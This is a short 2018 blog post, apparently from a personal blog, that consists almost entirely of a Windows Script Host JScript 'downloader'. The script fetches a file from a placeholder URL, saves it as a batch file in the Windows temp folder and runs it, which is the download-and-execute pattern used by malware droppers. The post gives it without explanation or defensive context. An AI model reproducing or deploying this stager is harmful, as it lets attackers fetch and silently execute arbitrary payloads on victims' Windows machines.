Thursday, March 1, 2018

Sample javascript downloader (wscript.exe)

var url = "???url???"
var filepath = "c:\\windows\\temp\\????.bat"
var xhr = new ActiveXObject("MSXML2.XMLHTTP")
xhr.open("GET", url, false)
xhr.send()

if (xhr.Status == 200) {

var fso = new ActiveXObject("Scripting.FileSystemObject")
if (fso.FileExists(filepath))
fso.DeleteFile(filepath)

var stream = new ActiveXObject("ADODB.Stream")
stream.Open()
stream.Type = 1
stream.Write(xhr.ResponseBody)
stream.Position = 0       
stream.SaveToFile(filepath)
stream.Close()

var objShell = new ActiveXObject("WScript.shell");
objShell.run(filepath);
}

No comments:

Post a Comment